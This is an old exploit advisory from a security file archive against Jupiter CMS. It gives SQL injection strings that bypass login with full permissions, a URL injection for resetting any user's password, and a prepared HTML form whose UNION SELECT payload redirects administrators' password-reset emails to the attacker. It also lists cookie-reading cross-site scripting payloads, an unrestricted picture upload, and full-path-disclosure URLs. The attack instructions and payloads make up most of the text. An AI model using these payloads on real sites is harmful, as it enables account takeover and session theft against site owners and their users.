jupiterCMS-sql.txt

jupiterCMS-sql.txt: Posted Sep 16, 2006; Authored by HACKERS PAL | Site soqor.net; The Jupiter CMS suffers from SQL injection, full path disclosure, and cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss, sql injection; SHA-256 | 14f38326a92f77da3ad6e2171702a182c136cb34437919df0954146718023047; Download | Favorite | View

jupiterCMS-sql.txt

Hello,,


 Jupiter CMS Sql injections ,full path and xss vulnerabilities


Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net


if magic_quotes_gpc = off
login with
user name : 
' or id=1/*
or
' or authorization = 4/*

you will be loged in with full permission
-------------------------
index.php?n=modules/register&a=3&d=3&key='%20or%20id=1/*
You will be able to change the password for any user .. know his id and put it in the url.

--
or you can use this form by changing http://localhost/jupiter/  to the website dir to recive reset password email to all the administrators

<form method="post" action="http://localhost/jupiter/index.php?n=modules/register">
<table class="main" cellspacing="1" cellpadding="4" width="100%">
<tr class="head"> 
<td colspan="2" class="head">Forgot your password?</td>
</tr>
<tr>
<td class="con1" width="42%" valign="middle"><span class="hilight">Username:</span></td>
<td class="con1" width="58%" valign="bottom"><input type="text" name="fpwusername" style="width:100%" class="box" tabindex="5" value="' union select id,authorization ,username ,password ,'security@soqor.net',url,age,flag,location,registered,lastvisit,forum_lastvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar,hideemail,templates,calendarbday,status,multikey,actime from users where id=1or authorization=4/*"></td>
</tr>
<tr>
<td class="con1"><input type="button" style="width:100" class="box" value="Back" onClick="window.history.go(-1);" tabindex="8"></td>
<td class="con1" align="right"><input type="submit" style="width:100" class="box" value="Submit" tabindex="7"></td>
</tr>
<input type="hidden" name="a" value="3">
<input type="hidden" name="d" value="1">
</table>
</form>

put the user name value
Change security@soqor.net to your email
' union select id,authorization ,username ,password ,'security@soqor.net',url,age,flag,location,registered,lastvisit,forum_lastvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar,hideemail,templates,calendarbday,status,multikey,actime from users where id=1or authorization=4/*
/********************************************/

Upload any picture to their gallery

modules/galleryuploadfunction.php

picture path will be 
gallery/albums/public/name.ext
/********************************************/

xss (Cross site scripting)

modules/blocks.php?is_webmaster=2&language[Admin%20name]=<script>alert(document.cookie);</script>
modules/blocks.php?is_webmaster=2&language[Admin%20back]=<script>alert(document.cookie);</script>

modules/register.php?is_guest=1&language[Register%20title]=<script>alert(document.cookie);</script>
modules/register.php?is_guest=1&language[Register%20title2]=<script>alert(document.cookie);</script>

modules/mass-email.php?language[Mass-Email%20form%20title]=<script>alert(document.cookie);</script>
modules/mass-email.php?language[Mass-Email%20form%20desc]=<script>alert(document.cookie);</script>
modules/mass-email.php?language[Mass-Email%20form%20desc2]=<script>alert(document.cookie);</script>
change the value for language[Mass-Email%20form%20desc(2-4)]

modules/register.php?is_guest=1&a=3&language[Forgotten%20title]=<script>alert(document.cookie);</script>
modules/register.php?is_guest=1&a=3&language[Forgotten%20desc]=<script>alert(document.cookie);</script>
modules/register.php?is_guest=1&a=3&language[Forgotten%20desc2]=<script>alert(document.cookie);</script>
change the var value for language[Forgotten%20desc(2 - 5)]


modules/search.php?language[Search%20view%20desc]=<script>alert(document.cookie);</script>
modules/search.php?language[Search%20view%20desc2]=<script>alert(document.cookie);</script>
Change the value for language[Search%20view%20desc(2-8)]

/********************************************/

Full path
includes/functions.php

modules/register.php?is_guest=1
modules/online.php
modules/poll.php
modules/panel.php
modules/pm.php
modules/news.php
modules/templates_change.php
modules/users.php
modules/misc.php?a=1&is_webmaster=1
modules/masspm.php
modules/mass-email.php?subject_choice=1&message_choice=1&a=1
modules/main-nav.php
modules/login.php
modules/layout.php?is_webmaster=2
modules/hq.php
modules/forum.php
modules/forum-admin.php?n=modules/forum-admin&a=1
modules/events.php
modules/emoticons.php
modules/download.php
modules/blocks.php?is_webmaster=2
modules/ban.php
modules/badwords.php
modules/ads.php
modules/admin.php

/********************************************/

WwW.SoQoR.NeT

Top Authors In Last 30 Days

Red Hat 278 files
Ubuntu 57 files
Gentoo 32 files
Debian 28 files
Apple 9 files
malvuln 6 files
Ahmet Umit Bayram 5 files
nu11secur1ty 5 files
Adam Gowdiak 4 files
liquidsky 3 files

File Archives

Systems

AIX (429)
Apple (2,087)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,042)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,499)
HPUX (880)
iOS (375)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,630)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,779)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,501)
UNIX (9,401)
UnixWare (187)
Windows (6,659)
Other

jupiterCMS-sql.txt

jupiterCMS-sql.txt

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

jupiterCMS-sql.txt

Share This

jupiterCMS-sql.txt

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems